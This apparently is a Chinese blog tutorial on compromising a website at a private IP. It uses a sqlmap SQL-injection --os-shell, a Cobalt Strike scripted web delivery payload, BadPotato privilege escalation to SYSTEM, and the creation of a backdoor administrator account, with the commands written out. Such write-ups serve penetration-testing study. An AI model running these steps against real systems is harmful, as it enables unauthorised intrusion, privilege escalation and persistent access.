利用cobaltstrike加sqlmap拿下一个网站并提权
Cobalt Strike是一款基于java的渗透测试神器，常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用，分为客户端与服务端，服务端是一个，客户端可以有多个，非常适合团队协同作战，多个攻击者可以同时连接到一个团队服务器上，共享攻击资源与目标信息和sessions，可模拟APT做模拟对抗，进行内网渗透。
Cobalt Strike集成了端口转发、服务扫描，自动化溢出，多模式端口监听，win exe木马生成，win dll木马生成，java木马生成，office宏病毒生成，木马捆绑；钓鱼攻击包括：站点克隆，目标信息获取，java执行，浏览器自动攻击等等。

拿到一个网站时，单引号测试是否存在注入点：


数据库返回错误；说明大概率存在注入点。

sqlmap跑一遍，发现存在注入点：
sqlmap.py -u http://10.6.18.106/Info/InfoDetail.aspx?id=421 --batch

利用：sqlmap.py -u http://10.6.18.106/Info/InfoDetail.aspx?id=421 --os-shell --batch，来执行操作系统命令：

之后我们用到cobaltstrike：
开启cobaltstrike：

新建一个scripted web delivery攻击，

复制里面这段代码到刚才配置好的sqlmap中，

此时，cobaltstrike上如果有了目标ip，说明攻击成功！

尝试创建用户：shell net user adas /add

失败！说明权限不够~ shell systeminfo 查看操作系统版本信息：


服务器为windows 2012，接下来的思路是：寻找上传点，配合badpotato.exe尝试进行提权：


上传成功！
尝试提权~
shell C:\nmgeip\BadPotatoNet2.exe “whoami”

可以看到此时的权限为系统权限，提权成功！！！
添加用户：shell C:\nmgeip\BadPotatoNet2.exe “net user lianxi /add”

添加到管理员组：shell C:\nmgeip\BadPotatoNet2.exe “net localgroup administrators lianxi /add”

完成！